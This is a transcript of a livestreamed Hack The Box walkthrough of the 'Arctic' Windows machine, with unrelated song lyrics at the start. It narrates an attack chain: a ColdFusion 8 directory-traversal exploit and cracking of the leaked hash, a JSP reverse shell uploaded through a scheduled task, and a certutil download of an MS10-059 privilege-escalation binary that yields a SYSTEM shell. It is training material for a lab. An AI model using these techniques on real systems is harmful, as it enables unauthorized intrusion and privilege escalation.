lost my best friend to 23. She left her body and hovered above me. I saw no shadow, I looked around, searched every building and home that I found. I saw no shadow, but felt a glow. The warmth inside me, it kept me afloat. It felt like heaven had found my bones and gave me comfort when I feel alone. Now you're gone, I'm alone. I guess it's time to get better. Through the pain, I will go alone. If I fall, break my bones, I will scream even louder. 'Cause I'm not dying alone. I lost my best friend to 23. She left her body and hovered above me. My best friend to 23. I heard the heavens crying above me. They gained an angel, I lost a friend. I felt like dying again and again. I went through hell, stared at death, but I keep fighting with each living breath. I saw no way out from where I stood. Felt like the fire had burned me through. Now you're gone, I'm alone. I guess it's time to get better. Through the pain, I will go alone. If I fall, break my bones, I will scream even louder. 'Cause I'm not dying alone. I lost my best friend.
Hello guys, hello. It's been a long time, but now I'm ready to solve a hack the box machine which is named as Arctic. Okay, so I have been getting some questions over there on my Discord server regarding this Windows walkthrough. Okay, so Windows machines walkthrough or anything else, you can call it anything else. So this is the main reason why I am doing this box today. So yes, if you want to join my server, or if you need more support, the links are in the description below. Okay, so let's proceed guys. I think so. We close this thing. Yeah, hi. Yeah, it is for, no, it's not for free, it's for VIP. Let me start that machine guys in the meantime. But the reason why I'm doing that is it's related to Windows. Okay, so there are no much good machines, much Windows machines out there. So yes, I think it could be helpful for you guys. I could do that. Like simply look into that, it will be fine. Yes. In the meantime, post your questions. It's gonna take a little bit of time to launch that. Okay, and let me connect my, let me go to the full screen. Okay, so yeah, this is my machine guys, my attacker machine. Okay, you can call it anything else. Okay, and also if you have any suggestions for the new videos, you can still post that out. Okay, so that I can implement in my upcoming videos. And if you are watching this video, make sure you like it and do share for more reach. Okay, So guys, let's start our progress. I think my audio and everything are fine now. I think so. You can see some good progress over here. Sorry, open this. Let me enlarge it for you guys. So cd hack the box. Let me remove my previous files. Okay, so I'm gonna connect to my VPN, guys. Okay, so this is the basic thing you need to do whenever you are in a CTF. You'll be given a VPN configuration file. You need to connect to that. Okay, so it's simple. Open VPN HTTP like the name, and it's going to take a little bit of time, and then you can see that it's getting connected. Okay, let me open a new tab as well, and let me make a directory Arctic. Okay, and let's navigate to that so that we can save all our data there. Okay, so that we can save some data there and it could be helpful for us. So yes, let's, I think it's started. I think so. See, we haven't got that yet. It is trying to connect. Okay, let that take some time. Not at all an issue. Is showing some errors. Okay, let's wait. It doesn't work. Let me stop that and let me run that again. So guys, coming to this Arctic machine. So Arctic is one of the a popular machine. Okay, so I'll tell you when while we go there. Okay, I'll show you what's the significance of this. Okay, with the help of this you can gain some good knowledge on a thing. Okay, I'll discuss that when I go over there. So if you could see here, we got a new interface, guys. So whenever you connect, we successfully connected to a VPN file, then you can see that a new network interface is getting added to your machine. Okay, so let me clear my screen, and the IP address, the target IP is 10.10.11. Let me copy this thing. So first let me ping that. Let's see whether we could ping it or not. Yes, we are able to ping it. So let's do an basic nmap scan, guys. It's really simple. Nmap -sc -sv, and the name, the IP address, sorry, and let me save that to basic.txt. Okay, so what I'm doing is really simple. So I'm looking for default scripts, and then for versions. Okay, the version that this particular Arctic machine is using, the services of the version or anything else. And then after that I'm printing all my output into this nmap basic.txt file, so that we can utilize that once we want to recheck or once we want to go back. Okay, it's going to take a little bit of time. Let that. So you can also see the status, guys, on the meantime by simply hitting space or enter. Okay, so that could gain more. Okay, let this complete, guys. Okay, let this complete. And to be and the information is Arctic is a Windows machine, as I told you previously. So Arctic is a Windows machine and we're going to exploit that now. Okay, so that's what our main uh, agenda for today is. Okay, and it's going to take a little bit of time. Let that take. So yes, taking a little bit of time. Oh no, the reason it's doing service scan. Let that do. And in the meantime, you can also do a simple nmap scan also, like without any argument or anything else. So you can get a little bit of information regarding that. Okay. Hi, hello. Yeah, yes guys, in the meantime we got the data. Let me quit this thing. So in the meantime guys, we got a data, like this is running three services, 135. Okay, it's for remote PC. Okay, and like remote connections. Okay, and here also guys, you can see the port 8500 is open, and you can see something like service FMTP. I don't know regarding that. Let's see what it is of. And also guys, here the port, again the remote control is open. Yeah, hello guys, hello everyone, thank you for joining me for today. And yes, so since these remote PC or things are not useful because we need to get the credentials, and since we're in the starting state, we don't even know the credentials, or we don't even know the username or things like that. So that's fine. Let's see, we got the file guys. Okay, so the important key point to be noted is, let me open a text editor. The important key point is port 8500. Okay, so that's the interesting. Okay, and the remaining are not so important. Remaining are not so important. Okay, so we'll discuss, or we'll check out and we'll enumerate this 8500 port. Okay, and also guys, in the meantime, let's also scan a complete scan. Previously we had performed a complex scan. Okay, yeah, sure Gaurav, it's on the list. Okay, you'll be getting that video soon. Okay, so I'll scan for a complete scan guys now. So I'm gonna specify my time interval of 4, and also hyphen capital A, like to do an aggressive scan. Like it looks for everything, like it looks for version scan, it looks for operating system and everything else. Okay, everything else. A means everything or all. Okay, anything else. And hyphen P hyphen looks for all 65,535 ports that our system is supporting or our system is using. And let me specify the IP, and let me print that out like nmap complete.txt. So yes guys, so even if you're doing bug bounty, so you need to learn nmap guys. Okay, so these are the normal things you need to do. So nmap is also so necessary, so that you can find out some interesting data out there as well. So let this complete guys, and as we noted previously that 8 port 8500 is open. So let's see what that's completely off. Let me try to access whether it's a web browser or others, or sorry, it's a website or anything else. Okay, let me do that. Okay, so the IP is 10.10.10.11 and the port is 8500. Okay, let's see what we are having over there, and if we find anything interesting, we can go ahead and we can do some important or interesting things out there. Okay, so yes, so if you are curious, I'm using Kali Linux version 2019.4, sorry, 2019.3. And guys, in the meantime, you can see that we got a little bit of things over here. So these are like normal things, like normal directories and stuff. Let me open all these things and let's see what are the interesting things that we can find out. So these are the directories. Let's see whether we can find anything interesting or not. Okay. So yes, I think so. We got it's loaded, guys. Let's see what the CFID is all about. Okay, so if you could see here, we can see something like administrator. It's look little bit interesting. Let me open that. Let me open that. So even though if you're doing bug bounty, so start with capture the flags. Okay, it'll teach you the good amount of enumeration and stuff. Okay. And I'm doing hack the box. Okay, if you're curious, and that's a VIP machine. Okay, a VIP machine. So you can do check that out if you are having a VIP membership. And also let's check out, guys, like we open the CFIDE and CF docs folders, and let's see what is available in CF docs. These are like some HTML file, guys. Okay, these are normal HTML files. This could not be useful for us, so let me close this thing. Okay, and let's see what we are getting over in this administrator. The reason is really simple. Okay, whenever you are doing penetration testing or anything else, if you find something related to admin or administrator, simply open that. Okay, simply open that, and if possible you can get some good amount of information. And sometimes there could not be any problem for accessing it. Okay, like there could not be some credentials or things like that. So whenever you find a name like administrator, simply go ahead. Okay, go ahead. Good things happen to you. Okay, so guys, here you can see that we got a page whenever I clicked on administrator, guys, and here you can see like we got a login page, which is Adobe Cold Fusion. Okay, Cold Fusion and 8, even the version is available, and it is asking for the password, which where the username is fixed here. So let's see whether we are having any exploits for this Adobe Cold Fusion 8 or not. Okay, so that's the basic thing. Whenever you find a service with a version, just simply look for the exploits. Fusion 8 exploit. Okay, so that's the basic thing you can do. It's reloaded, guys. Okay, so now let's see what we're having over here. We got some exploits, a bunch of exploits, a directory traversal. You can see some good stuff out there. Let me look what it's doing or what it is porting there. Let me open this. Yeah, it's opened. So if you can see, it's a Python script, guys. Let me try this out, guys. Okay, let me try this out. Let's see what we are having out there. Let me download this thing. Let me download this thing. I think it's downloaded. Yes. So in the meantime, let this complete scan run, guys. I think we could find some important data, or it could be the same data else. It could be the same data or anything else. So let me move the exploit from downloads. Sorry. So downloads to this folder, which is, let's name it as exploit.py, or let's name it as traversal.py. Okay, so let's name that like that, and let's see what we can get over there. And yes, we got it. We got a directory traversal exploit.py. Okay, so first of all, let's make it an executable. So chmod +x this thing, and let's see what we are having out there. So guys, one important thing, whenever you are running a Python script or anything else, here you can see something where, like, we guys mentioned // by default, but sometimes this doesn't work. So the best practice is specify the interpreter or the programming language you want to run in. Simply hit enter so that it works fine. Okay, you can see here it's working fine. Like, it's showing what are the things that we need to do. Okay, so let's go ahead. So it is asking for the host, which is the target IP 10.10.10.11, and the port is 8500, and it's also asking for the part. I don't know, so I don't know anything regarding that. So let me copy this and let me paste it over here. Let's see whether we can get anything or not. Yeah, it's working fine, guys. You can see it is trying for something else, like it's trying for almost all the things. Let's see whether we can get anything interesting or not. So I haven't done anything. I found, like, I got the version which is named as Cold Fusion thing. Okay, but let's see whether we can get anything interesting or not. So I haven't done anything. I found, like, I got the version which is named as Cold Fusion thing. Okay, but it is of version 8, guys. So I looked for the exploit, and there is a directory traversal exploit. Okay, directory traversal is really simple and easy. So what you will try to do is you try to access a different file from the server by doing some tricks over there. Okay, so yes, we can discuss. And guys, here you can see some important data out there is happened. So here you can see that let's copy this thing and let me paste it over in my notebook. Okay, so this is the finding, guys. So these are the things that you need to note them down. Okay, so here it's specifying the time. That's fine. It could be wrong as well because I haven't updated the time or anything else. And here you can see the password. It's nothing. And here also you can see the password, guys. And also here you can see the encrypted equal to true. So by this you can conclude that the particular password out there, the value out there is encrypted. Okay, so that's the basic thing. So what we can do is, let me copy this thing and let me close this thing because we find some important data, or you can leave that running. Okay, so let me make this a little bit faster since I already solved that. Okay, so guys, whenever you got a hash or anything else, so you need to find what's the algorithm used in order to convert that particular plain text to the ciphertext. So if you don't know regarding that, I recently I created a video on uh, basic cryptography. You can do check that out. Okay, that's the recent video. And let's see what we can do over here. So there is a tool called hash identifier, guys. Simply use that and simply paste the hash or encrypted hash or anything else there, and you simply hit enter. So if you could see here, guys, you can see the possible hashes are SHA-1, a secured hashing algorithm 1, and MySQL SHA-1. Okay, so these are nothing but SHA-1. So what we need to do is we'll try to decrypt this thing using SHA-1. And I don't know any command line tools, guys. Let me make use of some SHA-1 decryptor. Okay, so you can look some many tools out there. There will be like many tools out there, guys. And the best website that I could recommend you is this hash toolkit. Like I have been using this since I started my OSCP exam. So I found it's really working fine. You can see some good amount of things out there. It's not only available for SHA-1, it's available for MD5 and everything. Okay, here you can see some things. Okay, you can paste, let me paste that, guys, here, and let me search for that, and let's see whether we can get it or not. Here you can see, guys, that the decrypted format is nothing but happy day. So that could be our password. So let me try that out. HAPPYDAY. Yeah, crack station, anything is fine, Harsh. Okay, anything is fine, but personally I like this hash toolkit. Okay, personally I like that. It's your choice. And there is something like I'm not sure regarding that name, but let me see what's that name. Yeah, there's something like cyber chef as well, guys. You can do check that out. So is it invalid password? No, it's not an invalid password. Should work fine. Let me hit enter. Let's see whether we can get that now or not. I think now we should get that. It's reloading. And guys, this Adobe Cold Fusion is like resource hungry. So the reason why this is really slow is since these VMs get hosted on some Hackthebox servers, like they provide a limited amount of resources. But since these are bigger things, so it's gonna take a little bit of time. But you need to have patience. Okay, you need to have patience while solving these kind of challenges. So guys, you can see that we got it. So whenever it could be something like an error. Okay, sometimes uh, if you find the right password and if it doesn't work, just wait for some time. Okay, it will definitely give you some things out there. Okay, so here we got login, like we logged into this thing. So we can close these things, guys. These things really helped us. And let's see what we can do over here. Let's see what this interface is all about and stuff. Okay, so yes, here you can see this is an administrator page. Okay, but it's, as I told you, it is so slow, so slow. Let that be, let that be. Let's respect that. Okay, here you can see a good amount of information, guys, like the server settings, cache, data, services, and stuff like that. Okay, let me check my audio. Yes, it's working fine. So yes, you can see, guys, here some good amount of data out there. And also let's see how we can upload a shell to Cloud Fusion. Okay, let's see how we can do that. So there are many things out there. Let me see what all those things are. Let's come to the one thing that we can use. Okay, so this is not the one. So guys, you need to do a little bit of research over again and again here. So you can see some posts out there, but mostly are related to these are the walkthroughs. Okay, so basically you can upload the shell as the process of scheduling. Okay, so if you go down there in debugging, I think so, yes, in the debugging we can schedule the tasks, guys. In Adobe Cold Fusion is like where you can schedule some tasks. Okay, so if you could look into these videos and stuff. Okay, so this is the video, guys. I don't want to play it. Okay, but if you could watch this video, you can find out the information like how to upload a shell. Okay, so whenever you got an access to an admin page or anything else, so one important thing you need to do is you need to get the shell on the page. So that what you need to do is you need to upload some executable, or it could be like an exploit. You can call it an exploit. So if you do that, you will get the shell. That's the basic thing you need to do whenever you get an access to a panel, whether it could be an admin panel or whether it could be a user panel. Simply try to get the shell. Okay, so that's the basic thing you need to do. So guys, this is the video that I had seen, and this video completely shows you how you can upload a shell. Okay, upload a shell to this Cold Fusion platform. Okay, so guys, here in the debugging and logging, so here we can schedule some tasks, guys. It is taking lots and lots of time, guys, but let's be patient. Yeah, hi Arrow, hi. Thank you for joining me stream for today. Really, thank you. So let me close one tab here, guys, and here you can see that we can schedule some tasks. Okay, let me schedule a new task over here. Let me click on that, and it's gonna take a little bit of time again, since this is uh, consuming more memory, not mine, but the VM out there hosted on Hackthebox server. Okay, so you need to have lots of patience, guys. The reason is like when I solved this box for the first time, it took approximately 4 hours. Okay, like now I'm showing you the shortcut, but you need to do all this research, guys. Like if you want to upload a shell to, if you want to know how to upload a shell to the Cloud Fusion, you need to do lots and lots of research. Like you can look into some videos, you can look into some mini tutorials out there. But since this is a walkthrough, I'll only be showing you the way how you can do that. But while coming to the real CTFs, you need to do little bit of what you call uh, research on your own on what works and what doesn't work. Okay, so no arrow. The only thing you can upload here is JSP. So JSP is also one programming language which is Java related. So if you could see here, guys, so this Adobe Cold Fusion is completely based on Java. Okay, so the exploits you can use should be of Java format, and the one which we can use is JSP, Java Servlet Pages, or anything else. Okay, so you can look a little bit of information about JSP. So if you are into Java Servlet Pages, okay, Java Server or Servlet Pages, anything is fine. Bro, in uploading shell, why only PHP? Can there be any? That depends. Okay, that depends, Hitesh. It depends on the service, or it depends on what. Here in this case, we are using Cold Fusion. Okay, so yes, you could interrupt the connection, but since we got this everything by default, okay, like we got the exploit ready out there for this particular version, and everything is working fine, so you can go ahead. But anyhow you can use the burp suite as well. You can capture all the requests, that's fine, Arav. You can do anything, everyone have their own style. But like you try the exploit, and if you haven't got that, you can definitely look into the alternatives. Okay, you can definitely look into the alternatives. So guys, now we'll be uploading a shell. Let that name be shell. Okay, let that name be shell, or let that name be exploit, anything else, anything else. So here let's do everything, guys, and here we need to create a reverse shell. Okay, so if you can go to msfnum, so there is, you don't need to remember all these things, guys. Like you don't need to remember how to create all the payloads. Okay, since all these exams, all these practical exams are completely based on open book and open world exams, not open book, open world, which means that you can use internet or anything else. Okay, the only way these exams like OSCP or CH practical or anything they look from or they seek from you is whether he could like your mindset. Okay, like are you thinking like a hacker to hack it? Because you can find answers out there like normal quizzes etc in internet. Okay, these practical exams need to be solved practically. Okay, so these, that's the main reason practical exams has a lots and lots of values. Okay, so OSCP is one of that, and CH is like a basic over there. Okay, like it's basic, I can't compare that with an OSCP, but it's an entry level. Okay, so guys, here if you could scroll down, I can provide you this link. So this is the cheat sheet, guys, that I use for my CTFs or anything else. That's the cheat sheet that I use so that I can hover around. Okay, whenever I need an exploit. If you could see, guys, here you can see, you can see how you can create all these payloads out there. Like it here in the web payloads, since we are looking for the JSP, it's shown us how we can create a JSP shell. Let me copy this thing. Okay, so let me paste it over here, and let's add our IP. So we look into my IP. My IP is 10.14.14.14. Bro, I have completed my CH from BC Council self study. I'm currently doing for CCN course. Hope I passed. I think you told me that you completed CH, right? Okay, it's not clear, but yes. So the IP address of my machine is 10.14.14.14, guys. Sorry. So let me use that over here. Let the L port be 444, which is our favorite number, since we guys love that every time. 4444. Let me hit enter. Let it create a shell. Okay, and what you need to do is, if you could look carefully, guys, into this panel, it is asking for the URL of that. So what you need to do is, you need to host a server, or you need to host any web page out there so that it gets accessed. It's taking a little bit of time like that. Yes, guys, you can see that the shell.jsp is fine. So let's create a Python server, Python -m simple HTTP server, which is running on our, let that run on port 80. Okay, so okay, what I'm going to do is I'm going to add my IP and dot, yeah, it's readily available over here. Okay, so this is where the shell.jsp is available, guys. Okay, so this is the location where, and here let me output this file, let that be, and let the resolver be as well. But you need to see, like, so so here, guys, you can see, it's asking for the file or the location where it should be saved. Okay, so let's see what's the Cloud Fusion installation folders and stuff. Let's see what are those things. So as I told you, you need to do research, and you'll definitely find them. So what we'll do is we'll try to add the to CFIDE folder over there, okay, so that we can see that over here. Let's see where it is available in Windows. So let me go ahead, let me open that. Okay, let's see what we are having over there. So the solution is this, guys. Okay, you need to go to this Adobe Cold Fusion 8 installation guide so that you can see what are the locations and where it is getting installed. Okay, so that's the thing it will show you. Okay, so you can read that. So installation and where is the location. But for the time being, let me go there. So this is the location, guys, where it is getting stored. Okay, so let me show that for you. So it is in C directory. Since this is a Windows, there is a Cold Fusion 8 directory over there, and then there is a www.root. So if you look into this documentation, guys, you can see where it is getting installed. Okay, let me see. Okay, like you can definitely see where you can find that out. Okay, uh, that's the basic thing, guys. Okay, that's the basic thing. You can see a root, Adobe Cold Fusion 8 and stuff over there. You can see some good things over here, and do check them out. Okay, and as I told you that I will be installing this in this CFIDE folder or directory, and this is the thing over here. Let me close this thing, and if I go a little bit, I'm storing that as shell.jsp as the name suggests over there. So let me click on submit, guys, and let's see what happens over here. Let's see what happens over here. In the meantime, let me read your comments, guys. See what you are posting over here. Okay, cool. So guys, here you can see our task is successfully completed. Like, we registered a new task since we created an exploit which is running over port like which is looking for port 444. Let's open a netcat server out there, port 444, which is running on port 444. So what you need to do over here is here you can see, if you hover over these icons, you can see something like run the schedule task. So let's run this task. So let's see what happens. Read your question. There are something else. You can post your questions in the meantime, guys. It's almost all completed. Okay, it's almost all completed. Since I already solved this, I can give you surety for that. And guys, you can see the schedule task was completed successfully. So if you come back to this CFIDE folder where we specified our shell should be located, if you reload that, you can see something like shell.jsp over here. Okay, you can see something like shell.jsp over here. Let me show that for you. It's reloading. As I told you, it's taking a little bit of time. Let that. And yes, guys, here you can see a new file shell.jsp is available over here. Let me click over that, and we can get a shell over here, guys. That's the thing you are going to get. And also, guys, leave this server running, because whenever it needs that shell.jsp, so this is the location where it is available, so that it will download from that and then it will try to connect to that. And in the meantime, we got the shell, guys. We got the shell. So let's look, who am I? And we are a normal user, a pretty normal user. So let me come back and let's get the, you can use dir. Okay, if I'm wrong, I can go to the users. Okay, and once again directory, and since this is not an administrator, we can go to the administrator. So let's go to Tolis, and let's go to the desktop, and then if you do a dir, you can find the user.txt. You can simply do type user.txt, sorry, txt, and you'll get the output out there. Okay, so that's the common thing you can do. And so we completed the user flag, guys, but the important thing you need to do now is we need to escalate our privileges. Okay, so the escalation of privileges is really simple. So first of all, what you need to do is we are going to make use of this tool called let me show that, Windows Exploit Suggester. Okay, so this is an important tool that we'll be using out there. Okay, so whether it could be an OCP or anything else, so this is the tool that we'll be using. So here you can see something like how you can use it and stuff. So you can simply clone that, like copy this URL, do git clone. Okay, and that's the basic thing. So once you do that, let me open a new tab. Let me come back. It's on my normal root directory, guys. You can see Windows Exploit Suggester. So let me go to that, and here guys you can see something like let me remove some data so that you'll not get confused. So by default you will be seeing something like this, guys. Okay, so for the first time what you need to do is you need to install XLRD. Like if you look into these documents, they will provide you how you can install, like pip install XLRD. Okay, so XLRD is used for reading XLS files, like Excel files. Okay, so that's the reason why it is available out there. So coming to the point, so let's do a Windows Exploit Suggester. For the first time you need to do hyphen update. Not for the first time, but every time when you're running this, do this thing, simply hit enter, so that it will be writing some data over there into an Excel file. So this Excel file consists of some exploits and stuff out there. Okay, so I'll tell you what else. And coming to our target machine, so simply run a command called system info. So this is going to provide almost all the information regarding our system. So let's copy all these things, guys, only till the important things. Let me copy this thing and let me create a file here, guys. So I'll be using gedit systeminfo.txt. Okay, so I'm creating a file and I'm pasting that over here, guys. Let me save that and let me close that as well. And if I do an ls, you can see that two new files like systeminfo.txt and as well as an Excel file which is consisting of some exploits out there are available. So what we'll be doing is really simple. So run the following command /Windows Exploit Suggester and hyphen database. So as I told you, this is our database. So 2, and you can specify the tab, so it will auto complete that. And then you need to also specify the system information. So for that, hyphen system info, and then you need to specify the file where you saved the information that you acquired, like the system info information that you acquired. Okay, simply hit enter, and let's wait. Let's see the magic over here. So here you can see, guys, it is suggesting us for some possible exploits out there, but you can try out all of them. Here, like a pro tip is, like whenever you see something like cumulative update for Internet Explorer, like Internet Explorer related things are not useful. Okay, like you can't exploit that, because in this scenario, like in CTF scenario, look, anything else that is Internet Explorer, let's leave this. And there are some normal things out there, but if you are familiar, so one important thing, guys, let me open my notepad. So whenever you see something like MS10-059, so this is a Microsoft vulnerability. So this is named as chimichurri. So like I'm telling this based on my experience. Like I found this kind of privilege escalation paths with the help of chimichurri, like tons of them. So whenever you see something like MS10-059, so fix that it's chimichurri. So you can definitely find exploits over that, and you can use that to escalate your privileges. Okay, so that's the thing, guys. So or you can try out manually. So the one I had shown you is like a shortcut. Okay, so whenever you find MS10-059, simply put in the mind that it is a chimichurri exploit. So you can always get the chimichurri exploit from SecWiki. So SecWiki is a GitHub repo where it specifies all the Windows kernel exploit. Okay, so whenever you got a chance, go with kernel exploit because that's easy. So let's search for MS10-059. Like not only this, guys, you can find some tons of exploits over here, like tons and tons of exploits. So that's the reason I'm using search. So even this is a better resource that I can provide for you. the link I provided in the chat box. You can do check that out. So where is our thing? Yeah, here guys, you can see, you can simply click over that. So SecWiki is the best thing, and here you can find the exploit, guys. So like there are also other repositories, but the main usage, like the main application or the main helpful thing that I found with this SecWiki GitHub is it is providing a compiled executable. So generally what they provide is a C++ file. You need to execute that, and that's a different story. But since you are getting it ready made, simply make use of that. Let me click over that, guys, so that it will install for me. Like here in the next time you will be getting something like this. Click on download, it will download for you. Let me save that. Since this is, it is being caught by our browser saying that it's a virus, let me click over that and click on open, so that it won't be marked as virus from now. And coming to our Arctic machine, so what I'll do is I'll transfer that chimichurri exploit or ms10-059 to our main directory. Okay, we'll do that to the main directory. So it's really simple. Move from root document, download, it is ms10-059, and simply specify the dot, so that you can see something like this. So let me copy this, guys. Let me copy this thing, and here previously, guys, you can see something like we had already a server running out there, which is running in the same location, which is in the Hackthebox Arctic. Okay, so we can use of that only to transfer the payload from, or the transfer the exploit from our main machine to the target machine. Okay, so it's really simple. Okay, so now I'll do that. So this is the command that you need to use, guys, in order to transfer. Okay, so open the server out there on your main machine, attacking machine, and then download this on the Windows. Okay, so the command is simple: cert util -url cache -f, and specify the specify the path or the web URL or anything else, 10.10.14.14, and it's nothing but ms10-059. I copied that, and also specify the name that to be saved as. So it is looking for location, and then it is looking for the name that to be stored over there. Let's see whether we could exploit this or not. Okay, we close this tab. So you can see it's online, and you can see here in the status, you can see ms10-059 exploit is downloaded. You can see it's downloaded, and it's successfully executed, guys. Like, it's downloaded, guys. So if I do a dir, you can see the file is available here. So let me run that. You can run the executable really simple by simply specifying the file name, and it is giving me this exploit gives you a local system shell. The usage is the executable and IP address and the port. Okay, that's fine, that's really fine. So before, let me open a new server, guys, nc-nvlp on port 555, since 444 is already in use. So let me paste this thing. Let me specify the IP and the port 555. Let me hit enter. Let's see whether we can get shell or not, and we'll definitely get shell, guys, because I already solved that. And if you might be getting some doubt, like whether could we use Metasploit or not. You can use Metasploit, but the reason why I'm not doing that is, since I'm preparing for OSCP, and most of you guys are also interested in that, you need to put Metasploit or things related that, like only Metasploit, like MSF console, so that you can work fine. But you can use MSF Venom to create payloads. Okay, and guys, here we got something over here. Let's look. Who am I? We are anti-authority system. So we successfully exploited the system, and we successfully escalated our privileges. So that's the easiest thing, guys. Like, not so easy, like the exploit, like what you call, it's like escalating is really simple. Okay, since we known that chimichurri. Okay, and to be frank, put in like remember some popular exploits, privilege escalation exploits, so that it could save some little bit of time. So that's it, guys. How you can exploit this Arctic and how you can gain the root over this machine. I hope you find this tutorial or you find this process helpful. Okay, so I had shown you detailedly, but I had given you some self-learning work as well. Like you need to do a little bit of research in order to do something else. Okay, so that's it, guys. That's it for this walkthrough. If you are having any doubts, you can post here. I'll try to answer them. And you also post some suggestions. So that's it, guys. That's the end of the walkthrough, and I will be answering your questions out there that you will be posting here. So now I'll answer your questions, guys. Okay, let me answer your questions now. There is like a little bit of time. I'll definitely try to answer them. When time is ending up, if you're having any doubts or anything else, you can feel free to post them out. I'll try to answer them. If not, we can end this session. And really thank you guys for joining me for today. It's been really good feel for me, because you're spending amount of time over there. And if you miss this stream, if you really miss this stream, you can do check out my like if you need any support, you can do check out my Discord, where we can help you out there. Okay, so that's the location where we can help you. Okay, so if you feel anything else, you can definitely reach me out there. And still you can, if you need any help, like any personal help, you can reach me on Twitter. Every link is in the description below, guys. I'll be waiting for some more time. If you're having any doubts, you can post them out. I'll try to answer them. Okay, yeah, you can ask me. Try to answer them. Sure, Mahipal, if you are having will. And Mahipal, there is a video out there on my channel, which is regarding how to get started with cybersecurity. You can check that out. Yes, I could definitely help you. Okay, so there is a video on my channel, Mahipal, which is related to how to start with cybersecurity, or how to learn how to be a better ethical hacker. So if you follow that path, then you can definitely be a really good hacker. Okay, so I could definitely guarantee you that, like, if you follow the steps carefully and completely, then you can be a definitely good hacker out there. Okay, that's what I could recommend you. You can check out that on my channel. Okay, those are not sufficient. You should learn networking and everything. Don't limit yourself. Okay, learn everything that's possible and that's related. Pen testing course. Nope, man. I'm not much into that. Can go and see, if you watch that video, Mahipal, you'll definitely get what to do, and I even provide the resources. Okay, do check that video. If you are still having any doubts, then come to me. Okay, so suggest any web pen testing course. Learn OS top 10. Don't need to do any course. If you're not understanding any of that attack, Like there are many good videos out there on YouTube. You can do check them out. Okay, I don't suggest any web pen testing course because I haven't done anything. Like I've done some practical ethical hacking courses, but I haven't gone through this thing. People first check out that video and come back to me. Okay. Hi. It's not valuable. It's not valuable. Like it's a participation certificate. Like to be frank, the only thing that's helpful in Udemy is the subject that they teach. Okay. So the certificate is not so valuable. Not so valuable, but it's valuable to some extent, but it's not so valuable. Okay. Yes, I had done CH master till master. Like I'm certified ethical hacker master now. Like I completed CH normal exam and also the practical ethical hacking. Sorry, a practical exam as well. Now I'm CH master. Where can I learn bug bounty? Self learning. Okay, sure. To do. What technical stuff you need to learn, man? Need to be on ethical hacking side or you need to be on IT side. Like, what's your main thing or any goal or anything else? You don't need to be too technical for for this. Okay, like there, if there is some extent, then that's fine. But I'm not clear. I'm not so clear with your question. Like, what's your main or like what's your complete question? If you post that, I can definitely answer. Like one time you questioned me like you know some nmap and stuff, but now you are saying that you don't know technical stuff. So what's your complete question? If you could post that, then I can definitely answer that. Okay, like if it's partly, I can't answer that question. Okay. from 19. Sure, sure. So that's it, guys. That's it, guys, for today. Really, thank you for joining me. And so really, thank you for joining me for today. This is Satvik signing off. And if you are still having any doubts or if you still missed the stream, you can do contact me on my Discord or Twitter. Okay, the links are in the description below. So Mahipal, put your mind over here and do watch out my video on complete roadmap for cybersecurity. Okay, so that's the thing that I'm telling you from last forward, and I can't provide here right now. So really, thank you, guys. This is Satvik signing off, and if you're still having any doubts, as always, you can contact me via my Twitter or Discord. Okay. I can provide you the link. Just a minute, Mahipal. If you want, I can provide you the link. Thank you. Thank you, Funny. Thank you. So thank you, guys. If should have help anything else. So Mahipal, that's the video for you. Okay. So that's the basic things, and I even provide the resources. If you're still having any doubts, you can still post them out. I'll be available for some more time. Link it's in the description, Mahipal. It's in the description. You can do check that out. All the links are in the description, not in the comment box. It's in the description. You can do check that out. Okay, so I think so. It's sufficient, guys. I think so. It's fine. So I'm going to end this stream, and really thank you guys for joining me for today. And I hope I had cleared some of your doubts. And still, if I haven't cleared, tomorrow I'll be live from 5:30 p.m. Okay, from 5:30 p.m. I'll be live from tomorrow, and you can post your questions there. I'll try to answer them. Okay. So anything else, guys, that I can help you with? So yes, just a minute. If there is anything else I can help you, you can still post your questions, guys. I can help you to clear them. So that's it, guys. Thank you for joining me for today. Okay, so the stream is going to end soon. Really, thank you. Good night, and I'll meet you tomorrow at 5:30 p.m. Okay, so I'll be there for some time. You can post your questions there. Really, thank you for joining me for today, guys. This is Satvik signing off, and I'll meet you tomorrow with the next video. Bye.